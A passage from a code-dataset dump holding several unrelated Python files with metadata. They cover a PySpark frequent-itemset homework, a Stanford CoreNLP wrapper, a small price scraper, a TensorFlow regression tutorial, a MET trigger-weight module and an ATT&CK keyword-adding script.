item_set_size): possible_item_set_candidate_dict = dict() n_baskets_partition = 0 if item_set_size > 2: iterator = list(iterator) for _ in iterator: n_baskets_partition += 1 for i in range(previous_frequent_item_sets.__len__()-1): for j in range(i+1, previous_frequent_item_sets.__len__()): if previous_frequent_item_sets[i][:(item_set_size-2)] == \ previous_frequent_item_sets[j][:(item_set_size-2)]: possible_item_set_candidate = tuple(sorted(set( previous_frequent_item_sets[i]).union(set(previous_frequent_item_sets[j])))) # BUG IS HERE!!!!! for partitioned_basket in iterator: if set(possible_item_set_candidate).issubset(partitioned_basket): possible_item_set_candidate_dict = update_item_set_dict(possible_item_set_candidate_dict, possible_item_set_candidate) elif item_set_size == 2: for partitioned_basket in iterator: n_baskets_partition += 1 # go through all combinations of possible item sets by evaluating frequent singletons for possible_item_set_candidate in map(tuple, combinations(previous_frequent_item_sets, item_set_size)): if set(possible_item_set_candidate).issubset(partitioned_basket): possible_item_set_candidate_dict = update_item_set_dict(possible_item_set_candidate_dict, possible_item_set_candidate) else: # enumerate each item in each basket for partitioned_basket in iterator: partitioned_basket = list(partitioned_basket) n_baskets_partition += 1 for possible_item_set_candidate in partitioned_basket: possible_item_set_candidate_dict = update_item_set_dict(possible_item_set_candidate_dict, possible_item_set_candidate) frequent_item_set_candidates = prune_candidates(n_baskets_partition, sample_support_vars, possible_item_set_candidate_dict) yield frequent_item_set_candidates def phase_two(iterator, frequent_item_set_candidates, item_set_length): # iterator, iterator_copy = tee(iterator, 2) frequent_item_set_dict = dict() if item_set_length > 1: for basket in iterator: for frequent_item_set_candidate in frequent_item_set_candidates: if set(frequent_item_set_candidate).issubset(basket): frequent_item_set_dict = update_item_set_dict(frequent_item_set_dict, frequent_item_set_candidate) if item_set_length != 2: frequent_item_set = set((k, v) for k, v in frequent_item_set_dict.items()) else: frequent_item_set = set((k, v) for k, v in frequent_item_set_dict.items()) else: for basket in iterator: for frequent_item_set_candidate in basket: frequent_item_set_dict = update_item_set_dict(frequent_item_set_dict, frequent_item_set_candidate) frequent_item_set = set((k, v) for k, v in frequent_item_set_dict.items()) yield frequent_item_set def write_output_file(item_set_size, frequent_item_set_candidates, frequent_item_sets): f = open(argv[4], 'w') f.write('Candidates:\n') for i in range(1, item_set_size): if i == 2: f.write('\n') if i != 1: f.write(str(frequent_item_set_candidates[i])[1:-1].replace('), ', '),') + '\n\n') else: singletons = frequent_item_set_candidates[i] for j, frequent_singleton in enumerate(singletons): if j != singletons.__len__() - 1: f.write('(\'' + str(frequent_singleton) + '\'),') else: f.write('(\'' + str(frequent_singleton) + '\')\n') f.write('Frequent Itemsets:\n') for i in range(1, item_set_size): if i == 2: f.write('\n') if i != 1: if i != item_set_size - 1: f.write(str(frequent_item_sets[i])[1:-1].replace('), ', '),') + '\n\n') else: f.write(str(frequent_item_sets[i])[1:-1].replace('),', '),')) else: singletons = frequent_item_sets[i] for j, frequent_singleton in enumerate(singletons): if j != singletons.__len__() - 1: f.write('(\'' + str(frequent_singleton) + '\'),') else: f.write('(\'' + str(frequent_singleton) + '\')\n') f.close() def main(): start_time = time() sc, baskets, sample_support_vars = set_up_task2() # declare solution dictionaries frequent_item_set_candidates, frequent_item_sets = declare_son_vars() # track item set size... increases by 1 per iteration item_set_size = 1 keep_looping = True while keep_looping: if item_set_size > 1: previous_frequent_item_sets = frequent_item_sets[item_set_size - 1] if previous_frequent_item_sets.__len__() == 0: keep_looping = False # uncomment break while looping break else: previous_frequent_item_sets = None frequent_item_set_candidates[item_set_size] = tuple(sorted( baskets.mapPartitions( lambda iterator: phase_one(iterator, sample_support_vars, previous_frequent_item_sets, item_set_size)). flatMap(lambda element: element).distinct().collect())) if frequent_item_set_candidates[item_set_size].__len__() == 0: keep_looping = False del frequent_item_set_candidates[item_set_size] # uncomment break while looping break if item_set_size == 1: baskets = baskets.map(lambda basket: prune_baskets(basket, frequent_item_set_candidates[item_set_size])).repartition(3).persist() frequent_item_sets[item_set_size] = tuple(sorted( baskets.mapPartitions(lambda iterator: phase_two(iterator, frequent_item_set_candidates[item_set_size], item_set_size)). flatMap(lambda element: element).reduceByKey(add). filter(lambda element: element[1] >= sample_support_vars['support']). map(lambda element: element[0]).collect())) if item_set_size == 1: baskets = baskets.map(lambda basket: prune_baskets(basket, frequent_item_sets[item_set_size])).repartition(3).persist() if frequent_item_sets[item_set_size].__len__() == 0: keep_looping = False del frequent_item_sets[item_set_size] # uncomment break while looping break item_set_size += 1 write_output_file(item_set_size, frequent_item_set_candidates, frequent_item_sets) print('Duration: '+str(time() - start_time)) if __name__ == '__main__': main()
null
HW2/jacob_beaudin_task2.py
jacob_beaudin_task2.py
py
9,145
python
en
code
null
code-starcoder2
83
[ { "api_name": "pyspark.SparkContext", "line_number": 15, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 18, "usage_type": "name" }, { "api_name": "itertools.islice", "line_number": 18, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 20, "usage_type": "name" }, { "api_name": "sys.argv", "line_number": 32, "usage_type": "name" }, { "api_name": "itertools.combinations", "line_number": 86, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 126, "usage_type": "name" }, { "api_name": "time.time", "line_number": 162, "usage_type": "call" }, { "api_name": "operator.add", "line_number": 197, "usage_type": "argument" }, { "api_name": "time.time", "line_number": 214, "usage_type": "call" } ]
112345962
from TextToLif import TextToLif import sys sys.path.append('..') from LifFileParser import LifFileParser import corenlp import json """ This is the wrapper of stanford corenlp functions that saves the result as the LIF format. """ class StanfordTokenizer: def __init__(self, lif_string=""): self.lif_parser = LifFileParser(string=lif_string) self.text = self.lif_parser.data['payload']['text']['@value'] def call_tokenizer(self): token_annotations = [] port = 9000 address = "http://localhost:" + str(port) success = False while not success: try: with corenlp.client.CoreNLPClient(annotators="tokenize".split(),endpoint=address) as client: ann = client.annotate(self.text) id = 0 for token in ann.sentencelessToken: word = token.word start = int(token.beginChar) end = int(token.endChar) new_ann = { "id": "tok" + str(id), "start": start, "end": end, "@type": "http://vocab.lappsgrid.org/Token", "label": "http://vocab.lappsgrid.org/Token", "features": { "word": word } } id += 1 token_annotations.append(new_ann) success = True break except: port += 1 success = False metadata = { "contains": { "http://vocab.lappsgrid.org/Token": { "producer": "org.anc.lapps.stanford.Tokenizer:2.0.0", "type": "stanford" } } } view = { "metadata": metadata, "annotations": token_annotations } self.lif_parser.data["payload"]["views"].append(view) class StanfordSentenceSplitter: def __init__(self, lif_string=""): self.lif_parser = LifFileParser(string=lif_string) self.text = self.lif_parser.data['payload']['text']['@value'] def call_splitter(self): sent_annotations = [] port = 9000 address = "http://localhost:" + str(port) success = False while not success: try: with corenlp.client.CoreNLPClient(annotators="ssplit".split()) as client: ann = client.annotate(self.text) id = 0 for sentence in ann.sentence: length = len(sentence.token) start = int(sentence.token[0].beginChar) end = int(sentence.token[length-1].endChar) ss = self.text[start:end] new_ann = { "id": "sent"+str(id), "start": start, "end": end, "@type": "http://vocab.lappsgrid.org/Sentence", "label": "Sentence", "features":{ "sentence": ss } } id += 1 sent_annotations.append(new_ann) success = True break except: port += 1 success = False metadata = { "contains": { "http://vocab.lappsgrid.org/Sentence": { "producer": "org.anc.lapps.stanford.SentenceSplitter:2.0.0", "type": "sentence:stanford" } } } view = { "metadata": metadata, "annotations": sent_annotations } self.lif_parser.data["payload"]["views"].append(view) class StanfordTagger: def __init__(self, lif_string=""): self.lif_parser = LifFileParser(string=lif_string) self.text = self.lif_parser.data['payload']['text']['@value'] def call_pos(self): sent_annotations = [] with corenlp.client.CoreNLPClient(annotators="pos".split()) as client: ann = client.annotate(self.text) print(ann) if __name__ == "__main__": converter = TextToLif("Gross Pathology\nThis content contains adenocarcinoma !? I expect it to be tagged.") converter.convert_lif() st = StanfordTokenizer(converter.lif_string) st.call_tokenizer() stanford_tokenizer_lif = json.dumps(st.lif_parser.data) sentence = StanfordSentenceSplitter(stanford_tokenizer_lif) sentence.call_splitter() stantord_sentence_splitter_lif = json.dumps(sentence.lif_parser.data) print(stantord_sentence_splitter_lif)
null
HLAFeatureLibrary/Training/stanford_wrapper.py
stanford_wrapper.py
py
3,724
python
en
code
null
code-starcoder2
83
[ { "api_name": "sys.path.append", "line_number": 4, "usage_type": "call" }, { "api_name": "sys.path", "line_number": 4, "usage_type": "attribute" }, { "api_name": "LifFileParser.LifFileParser", "line_number": 16, "usage_type": "call" }, { "api_name": "corenlp.client.CoreNLPClient", "line_number": 26, "usage_type": "call" }, { "api_name": "corenlp.client", "line_number": 26, "usage_type": "attribute" }, { "api_name": "LifFileParser.LifFileParser", "line_number": 67, "usage_type": "call" }, { "api_name": "corenlp.client.CoreNLPClient", "line_number": 77, "usage_type": "call" }, { "api_name": "corenlp.client", "line_number": 77, "usage_type": "attribute" }, { "api_name": "LifFileParser.LifFileParser", "line_number": 119, "usage_type": "call" }, { "api_name": "corenlp.client.CoreNLPClient", "line_number": 124, "usage_type": "call" }, { "api_name": "corenlp.client", "line_number": 124, "usage_type": "attribute" }, { "api_name": "TextToLif.TextToLif", "line_number": 129, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 134, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 138, "usage_type": "call" } ]
211228052
import requests from bs4 import BeautifulSoup url = 'http://www.lazada.com.ph/apple-macbook-pro-mf839zpa-8gb-intel-core-i5-13-540573.html' request = requests.get(url) content = request.content soup = BeautifulSoup(content, "html.parser") element = soup.find("span", {"itemprop": "price", "id": "special_price_box"}) string_price = element.text.strip() string_price = string_price.replace(',', '') price = float(string_price) if price < 60000: print("Within the budget, current price is {}".format(string_price)) else: print("Do not buy its to expensive at the moment. Current price: {}".format(string_price)) # <span id="special_price_box" itemprop="price">61,899.00</span>
null
src/app.py
app.py
py
685
python
en
code
null
code-starcoder2
83
[ { "api_name": "requests.get", "line_number": 6, "usage_type": "call" }, { "api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call" } ]
257900350
from collections import namedtuple TaskData = namedtuple('TaskData', ( # Time when the task was started 'startTime', # Mesos' ID of the slave where task is being run 'slaveID', # Mesos' ID of the executor running the task 'executorID')) ResourceRequirement = namedtuple('ResourceRequirement', ( # Number of bytes (!) needed for a task 'memory', # Number of CPU cores needed for a task 'cpu', # Number of bytes (!) needed for task on disk 'disk')) ToilJob = namedtuple('ToilJob', ( # A batchjob ID specific to this batch system implementation 'jobID', # A ResourceRequirement tuple describing the resources needed by this batchjob 'resources', # The command to be run on the worker node 'command', # The resource object representing the user script 'userScript', # The resource object representing the toil source tarball 'toilDistribution'))
null
src/toil/batchSystems/mesos/__init__.py
__init__.py
py
934
python
en
code
null
code-starcoder2
83
[ { "api_name": "collections.namedtuple", "line_number": 3, "usage_type": "call" }, { "api_name": "collections.namedtuple", "line_number": 11, "usage_type": "call" }, { "api_name": "collections.namedtuple", "line_number": 19, "usage_type": "call" } ]
109328546
""" 基本语法练习 1. 规范格式 1.1 构建执行图 1.2 加载持久化模型,两种方式 2. 完成作业 2.1 变量作用域,变量定义规范,变量重用 2.2 模型训练:图构建,执行图 2.3 模型预测,pyplot画图 """"" import numpy as np import tensorflow as tf from matplotlib import pyplot as plt """ ** 【实际项目模板】 - 构建图和执行图 ** """ # with tf.Graph().as_default(): # # 一、基于业务知识,构建执行图对象 # # 1. 数据的特征工程 # # # 2. 模型构建 # # # 二、运行 # with tf.Session() as sess: # # 1. 加载数据 # # # 2. 图执行 # # # 3. 图效果查看 # # # 4. 持久化 # pass """ ** 【实际项目模板】 - 加载持久化模型一 ** """ # with tf.Graph().as_default(): # # 1. 构建和训练过程完全一样的执行图 # # # 2. 运行 # with tf.Session() as sess: # # 1. 加载模型 # # # 2. 使用模型预测,获取预测结果 # pass """ ** 【实际项目模板】 - 加载持久化模型二 ** """ # with tf.Graph().as_default(): # with tf.Session() as sess: # # 1. 加载模型,同时加载执行图信息(从持久化信息中获取) # # # 2. 使用模型预测,获取预测结果 # pass """ 作业:y = wx + b 要求: 1. 模拟图构建与执行图 2. 模型持久化 3. 模型加载与预测(可视化) """ """ 1. 模拟图构建与执行图 """ def build_and_exec_model(): with tf.Graph().as_default(): # 一、基于业务知识,构建执行图对象 # 2. 模型构建 # a. 定义输入x、y变量 # trainable: 参与模型训练更新 """ Variable与get_variable区别 1. 同:都是定义变量方式 2. 异: 2.1 同一个图中,使用Variable定义同name变量,新建,底层会自动累积name 2.2 同一个图中,使用get_variable定义同name变量,,根据name判断变量是否存在,不存在新建,存在报错 若需支持存在重用:添加重用参数 或 设置变量重用作用域 """ input_x = tf.Variable(name="input_x", dtype=tf.float32, initial_value=np.array( [[2, 3, 4, 5, 6], [8, 3, 5, 5, 5], [3, 6, 9, 5, 8]]).reshape( (5, 3))) input_y = tf.Variable(name="input_y", dtype=tf.float32, initial_value=[[0], [1], [1], [0], [1]]) # input_y_test = tf.Variable(name="input_y", dtype=tf.float32, # initial_value=[[0], [1], [1], [0], [1]]) # # # <tf.Variable 'input_x:0' shape=(5, 3) dtype=float32_ref> # # <tf.Variable 'input_y:0' shape=(5, 1) dtype=float32_ref> # # <tf.Variable 'input_y_1:0' shape=(5, 1) # print(input_x, input_y, input_y_test) print(input_x, input_y) # 模型参数 # w:默认生成一个初始化均值为0,标准差为1.0且服从高斯分布的3x1矩阵 w = tf.get_variable(name="w", dtype=tf.float32, shape=[3, 1], trainable=True, initializer=tf.random_normal_initializer(mean=0.0, stddev=1.0)) # b:默认生成一个初始化均值为0,标准差为1.0且服从高斯分布的3x1矩阵 b = tf.get_variable(name="b", shape=[1], dtype=tf.float32, trainable=True, initializer=tf.zeros_initializer()) ''' 重用同名变量方式一:tf.get_variable_scope().reuse_variables() ''' # tf.get_variable_scope().reuse_variables() # b_test = tf.get_variable(name="b", shape=[1], dtype=tf.float32, trainable=True, # initializer=tf.zeros_initializer()) ''' 重用同名变量方式二 ''' # reuse=True: 有问题的,所以得用reuse=tf.AUTO_REUSE # with tf.variable_scope("reuse", reuse=tf.AUTO_REUSE, # initializer=tf.constant_initializer(18)): # # variable_scope中定义了initializer且变量没有定义initializer;则with语句块中默认都使用该initializer # b_test_2 = tf.get_variable(name="b", shape=[1], dtype=tf.float32, trainable=True, # initializer=tf.zeros_initializer()) # ValueError: Variable b already exists, disallowed. # Did you mean to set reuse=True or reuse=tf.AUTO_REUSE in VarScope? Originally defined at: # print(w, b, b_test) print(w, b) # 预测值 y_ = tf.matmul(a=input_x, b=w) + b print(y_) # 损失函数(平方和损失函数:sigma((y - y_) ** 2) / m) # reduce_mean: 聚合均值(降低一些其他代码,整合了一下) loss = tf.reduce_mean(tf.square(input_y - y_)) # 定义优化器(求解损失函数最小的模型参数<变量>的方式) optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01) # 定义训练操作(此处对象) """ 模型参数更新方式(GradientDescentOptimizer底层封装) 总结:通过给定的损失函数(loss:Tensor对象),反向查找到此图中的所有变量进行更新,使得损失函数最小 NOTE: 1. 获取图中所有变量,在满足初始化前提条件下,适当更新变量,使得损失函数最小 2. 若想只受模型参数(w,b)影响,则需保留两个变量(w,b),其他为常量(constant,placeholder) 或者让其他变量不参与模型训练,即trainable=False 3. minimize方法中封装了,找出变量,更新变量值的方法 """ # 更新方式:通过给定的损失函数,求梯度,更新模型参数(即变量) tran_op = optimizer.minimize(loss) # == 等价于 == # # 获取所有训练变量 # var_list = tf.global_variables() # # 计算梯度 # grads_and_vars = tf.compute_gradients(var_list) # # 更新梯度(更新模型参数) # tran_op = tf.apply_gradients(grads_and_vars) # 获取变量初始化操作 # init_op = tf.initialize_all_variables() # return global_variables_initializer() init_op = tf.global_variables_initializer() # 二、运行 with tf.Session() as sess: # 1. 加载数据 # 变量初始化 # FailedPreconditionError: Attempting to use uninitialized value input_y sess.run(init_op) # 2. 图执行 for i in range(20): loss_, w_, b_, input_x_, input_y_, tran_op_ = sess.run( [loss, w, b, input_x, input_y, tran_op]) print("损失函数:{}".format(loss_)) print("w:{}".format(w_)) print("b:{}".format(b_)) print("input_x:{}".format(input_x_)) print("input_y:{}".format(input_y_)) print("*" * 20) # 3. 图效果查看 # 4. 持久化 pass def build_and_exec_model_2(): # dimension: 维度 # DIMEN = 3 DIMEN = 1 with tf.Graph().as_default(): # 一、基于业务知识,构建执行图对象 # 2. 模型构建 # a. 定义输入x、y变量 # trainable: 参与模型训练更新 input_x = tf.placeholder(name="input_x", dtype=tf.float32, shape=[None, DIMEN]) input_y = tf.placeholder(name="input_y", dtype=tf.float32, shape=[None, 1]) print(input_x, input_y) # 模型参数 # w:默认生成一个初始化均值为0,标准差为1.0且服从高斯分布的3x1矩阵 w = tf.get_variable(name="w", dtype=tf.float32, shape=[DIMEN, 1], initializer=tf.random_normal_initializer(mean=0.0, stddev=1.0)) # b:默认生成一个初始化均值为0,标准差为1.0且服从高斯分布的3x1矩阵 b = tf.get_variable(name="b", shape=[1], dtype=tf.float32, initializer=tf.zeros_initializer()) print(w, b) # 预测值 y_ = tf.matmul(a=input_x, b=w) + b print(y_) # 损失函数(平方和损失函数:sigma((y - y_) ** 2) / m) # reduce_mean: 聚合均值(降低一些其他代码,整合了一下) loss = tf.reduce_mean(tf.square(input_y - y_)) # 定义优化器(求解损失函数最小的模型参数<变量>的方式) # 用的比较多的学习率:0.001, 0.0001 # 开始选:1e-8, 1e-6 """ 产生nan,学习率不够或者迭代次数不够 """ optimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-4) # 定义训练操作(此处对象) """ 模型参数更新方式(GradientDescentOptimizer底层封装) 总结:通过给定的损失函数(loss:Tensor对象),反向查找到此图中的所有变量进行更新,使得损失函数最小 NOTE: 1. 获取图中所有变量,在满足初始化前提条件下,适当更新变量,使得损失函数最小 2. 若想只受模型参数(w,b)影响,则需保留两个变量(w,b),其他为常量(constant,placeholder) 或者让其他变量不参与模型训练,即trainable=False 3. minimize方法中封装了,找出变量,更新变量值的方法 """ train_op = optimizer.minimize(loss) # 获取变量初始化操作 # init_op = tf.initialize_all_variables() # return global_variables_initializer() init_op = tf.global_variables_initializer() # 二、运行 with tf.Session() as sess: # 1. 加载数据 """ a. 变量初始化操作 """ # FailedPreconditionError: Attempting to use uninitialized value input_y sess.run(init_op) """ b. 训练数据的产生/获取(基于numpy随机产生<可以先考虑一个固定的数据集>) """ """ np.random.normal(产生一个服从高斯分布(Gaussian Distribution)的拟合) Parameters ---------- loc : float or array_like of floats Mean ("centre") of the distribution. scale : float or array_like of floats Standard deviation (spread or "width") of the distribution. size : int or tuple of ints, optional Output shape. If the given shape is, e.g., ``(m, n, k)``, then ``m * n * k`` samples are drawn. If size is ``None`` (default), a single value is returned if ``loc`` and ``scale`` are both scalars. Otherwise, ``np.broadcast(loc, scale).size`` samples are drawn. np.random.randn(产生一个服从标准正太分布的矩阵) ------- """ # [0, 8]且N条数据的一维线性(等差数列)数组 + 服从均值为0,标准差为2且服从正太分布的N条数据一维数组 N = 300 """ 此处多维不好画图,统一使用一维 """ b = np.array([8]) # 3x1 # w = np.array([0.2, 0.8, 0.3]).reshape((-1, DIMENSION)).T # 1x1 w = np.array([12]).reshape((-1, DIMEN)).T # 100x3 train_x = (np.linspace(0, 6, N) + np.random.normal(0, 2, N)).reshape((-1, DIMEN)) # 100x3 dot 3x1 = 100x1 + 1x1 + 100x1 # N / 3 = 100.0 # N // 3 = 100 train_y = np.dot(train_x, w) + b + np.random.normal(0, 2, N // DIMEN).reshape((-1, 1)) # 2. 图执行 """ c. 模型训练 """ for step in range(1000): # 开始训练 loss_, tran_op_ = sess.run( [loss, train_op], feed_dict={ input_x: train_x, input_y: train_y }) print("第{}次训练后模型的损失函数:{}".format(step, loss_)) # 3. 图效果查看 """ d. 构造一个测试数据集或者使用训练数据集,得到该数据对应的预测值,做一个可视化操作 """ predict = sess.run(y_, feed_dict={ input_x: train_x }) # 训练红色点 plt.plot(train_x, train_y, "ro") # 预测蓝色线 plt.plot(train_x, predict, 'g-') plt.show() # 4. 持久化 pass if __name__ == '__main__': # build_and_exec_model() build_and_exec_model_2()
null
2019/AI/DeepLearning/TensorFlow/01_practice/03_basic_grammer.py
03_basic_grammer.py
py
12,858
python
en
code
null
code-starcoder2
83
[ { "api_name": "tensorflow.Graph", "line_number": 73, "usage_type": "call" }, { "api_name": "tensorflow.Variable", "line_number": 86, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 86, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 87, "usage_type": "call" }, { "api_name": "tensorflow.Variable", "line_number": 90, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 90, "usage_type": "attribute" }, { "api_name": "tensorflow.get_variable", "line_number": 103, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 103, "usage_type": "attribute" }, { "api_name": "tensorflow.random_normal_initializer", "line_number": 104, "usage_type": "call" }, { "api_name": "tensorflow.get_variable", "line_number": 106, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 106, "usage_type": "attribute" }, { "api_name": "tensorflow.zeros_initializer", "line_number": 107, "usage_type": "call" }, { "api_name": "tensorflow.matmul", "line_number": 126, "usage_type": "call" }, { "api_name": "tensorflow.reduce_mean", "line_number": 131, "usage_type": "call" }, { "api_name": "tensorflow.square", "line_number": 131, "usage_type": "call" }, { "api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 134, "usage_type": "call" }, { "api_name": "tensorflow.train", "line_number": 134, "usage_type": "attribute" }, { "api_name": "tensorflow.global_variables_initializer", "line_number": 157, "usage_type": "call" }, { "api_name": "tensorflow.Session", "line_number": 160, "usage_type": "call" }, { "api_name": "tensorflow.Graph", "line_number": 188, "usage_type": "call" }, { "api_name": "tensorflow.placeholder", "line_number": 193, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 193, "usage_type": "attribute" }, { "api_name": "tensorflow.placeholder", "line_number": 194, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 194, "usage_type": "attribute" }, { "api_name": "tensorflow.get_variable", "line_number": 199, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 199, "usage_type": "attribute" }, { "api_name": "tensorflow.random_normal_initializer", "line_number": 200, "usage_type": "call" }, { "api_name": "tensorflow.get_variable", "line_number": 202, "usage_type": "call" }, { "api_name": "tensorflow.float32", "line_number": 202, "usage_type": "attribute" }, { "api_name": "tensorflow.zeros_initializer", "line_number": 203, "usage_type": "call" }, { "api_name": "tensorflow.matmul", "line_number": 207, "usage_type": "call" }, { "api_name": "tensorflow.reduce_mean", "line_number": 212, "usage_type": "call" }, { "api_name": "tensorflow.square", "line_number": 212, "usage_type": "call" }, { "api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 218, "usage_type": "call" }, { "api_name": "tensorflow.train", "line_number": 218, "usage_type": "attribute" }, { "api_name": "tensorflow.global_variables_initializer", "line_number": 233, "usage_type": "call" }, { "api_name": "tensorflow.Session", "line_number": 236, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 263, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 267, "usage_type": "call" }, { "api_name": "numpy.linspace", "line_number": 269, "usage_type": "call" }, { "api_name": "numpy.random.normal", "line_number": 269, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 269, "usage_type": "attribute" }, { "api_name": "numpy.dot", "line_number": 273, "usage_type": "call" }, { "api_name": "numpy.random.normal", "line_number": 273, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 273, "usage_type": "attribute" }, { "api_name": "matplotlib.pyplot.plot", "line_number": 292, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.plot", "line_number": 294, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.show", "line_number": 295, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name" } ]
73396807
import numpy as np from numba import njit, float32 class WeightMetTrigger(object): def __init__(self, **kwargs): self.__dict__.update(kwargs) def begin(self, event): self.cats = sorted([nmu for nmu in self.correction_files.keys()]) self.bins = [] self.corr = [] self.corr_up = [] self.corr_down = [] for nmuon in self.cats: bins, corr, corr_up, corr_down = read_file(self.correction_files[nmuon]) self.bins.append(bins) self.corr.append(corr) self.corr_up.append(corr_up) self.corr_down.append(corr_down) def event(self, event): nmuons = event.MuonSelection.pt.stops - event.MuonSelection.pt.starts met = event.METnoX.pt corrs, corrs_up, corrs_down = get_correction( self.cats, self.bins, self.corr, self.corr_up, self.corr_down, nmuons, met, ) event.Weight *= corrs event.Weight_metTrigSFUp = np.divide(corrs_up, corrs, out=np.zeros_like(corrs_up), where=corrs!=0) event.Weight_metTrigSFDown = np.divide(corrs_down, corrs, out=np.zeros_like(corrs_down), where=corrs!=0) @njit def get_correction(cats, bins, incorr, incorr_up, incorr_down, nmuons, met): nev = nmuons.shape[0] corrs = np.ones(nev, dtype=float32) corrs_up = np.ones(nev, dtype=float32) corrs_down = np.ones(nev, dtype=float32) for iev in range(nev): if nmuons[iev] not in cats: continue cat = cats.index(nmuons[iev]) for ibin in range(bins[cat].shape[0]): if bins[cat][ibin,0] <= met[iev] < bins[cat][ibin,1]: corrs[iev] = incorr[cat][ibin] corrs_up[iev] = incorr_up[cat][ibin] corrs_down[iev] = incorr_down[cat][ibin] break return corrs, corrs_up, corrs_down def read_file(path, overflow=True): with open(path, 'r') as f: lines = [l.split() for l in f.read().splitlines() if l.strip()[0]!="#"][1:] bins = np.array([map(float, l[1:3]) for l in lines]) corr = np.array([float(l[3]) for l in lines]) corr_up = np.array([1.+float(l[5]) for l in lines]) corr_down = np.array([1.+float(l[4]) for l in lines]) if overflow: bins[-1,-1] = np.infty return bins, corr, corr_up, corr_down
null
sequence/Modules/WeightMetTrigger.py
WeightMetTrigger.py
py
2,559
python
en
code
null
code-starcoder2
83
[ { "api_name": "numpy.divide", "line_number": 29, "usage_type": "call" }, { "api_name": "numpy.zeros_like", "line_number": 30, "usage_type": "call" }, { "api_name": "numpy.divide", "line_number": 32, "usage_type": "call" }, { "api_name": "numpy.zeros_like", "line_number": 33, "usage_type": "call" }, { "api_name": "numpy.ones", "line_number": 39, "usage_type": "call" }, { "api_name": "numba.float32", "line_number": 39, "usage_type": "name" }, { "api_name": "numpy.ones", "line_number": 40, "usage_type": "call" }, { "api_name": "numba.float32", "line_number": 40, "usage_type": "name" }, { "api_name": "numpy.ones", "line_number": 41, "usage_type": "call" }, { "api_name": "numba.float32", "line_number": 41, "usage_type": "name" }, { "api_name": "numba.njit", "line_number": 36, "usage_type": "name" }, { "api_name": "numpy.array", "line_number": 62, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 63, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 64, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 65, "usage_type": "call" }, { "api_name": "numpy.infty", "line_number": 68, "usage_type": "attribute" } ]
50700885
#!/usr/bin/python3 import sys, json from collections import defaultdict # This script was designed to allow users to add TTP:keyword associations # The input parameters for the script are as follows: # - python add_user_keywords.py [enterprise|mobile] "Txxxx:keywords,to add,here:Txxxx:other,keywords to add,etc." # - The "Txxxx" in this case represents the TTP ID, i.e. T1234 # This is the relative path from the script to the files it needs relative_path = sys.path[0] + '/ttpkeywords/' # These are the output files for the user-specified keywords # I decided against using additional_enterprise_keywords.json and additional_mobile_keywords.json as the output files # The files mentionned above allow for multiple keywords to be added to ttps with similar name contents # While this script allows adding keywords to a specified TTP ID enterprise_file = relative_path + 'user_enterprise_keywords.json' mobile_file = relative_path + 'user_mobile_keywords.json' # Setting up the variables according to the provided parameters when running the script if sys.argv[1] == 'enterprise': selected_file = enterprise_file elif sys.argv[1] == 'mobile': selected_file = mobile_file else: print('Invalid matrix selected!') print('Please run the script using the following parameters:') print('python add_user_keywords.py [mobile|enterprise] "T1234:keywords to add,separated,by,commas:T5678:same,thing,here,etc."') sys.exit() print(sys.path[0]) # Adding the keywords with open(selected_file, 'r+') as file: keyword_dict = json.load(file) file.seek(0) input_list = sys.argv[2].split(':') # Incrementing by 2 here because of how the input is formatted # Even index numbers represent TTP IDs, while odd index numbers represents the keywords for i in range(0, len(input_list), 2): keyword_dict.setdefault(input_list[i],[]).extend(input_list[i+1].split(',')) keyword_dict[input_list[i]] = list(set(keyword_dict[input_list[i]])) json.dump(keyword_dict, file, indent = 4)
null
add_user_keywords.py
add_user_keywords.py
py
2,027
python
en
code
null
code-starcoder2
83
[ { "api_name": "sys.path", "line_number": 12, "usage_type": "attribute" }, { "api_name": "sys.argv", "line_number": 22, "usage_type": "attribute" }, { "api_name": "sys.argv", "line_number": 24, "usage_type": "attribute" }, { "api_name": "sys.exit", "line_number": 30, "usage_type": "call" }, { "api_name": "sys.path", "line_number": 32, "usage_type": "attribute" }, { "api_name": "json.load", "line_number": 36, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 38, "usage_type": "attribute" }, { "api_name": "json.dump", "line_number": 44, "usage_type": "call" } ]
484428340
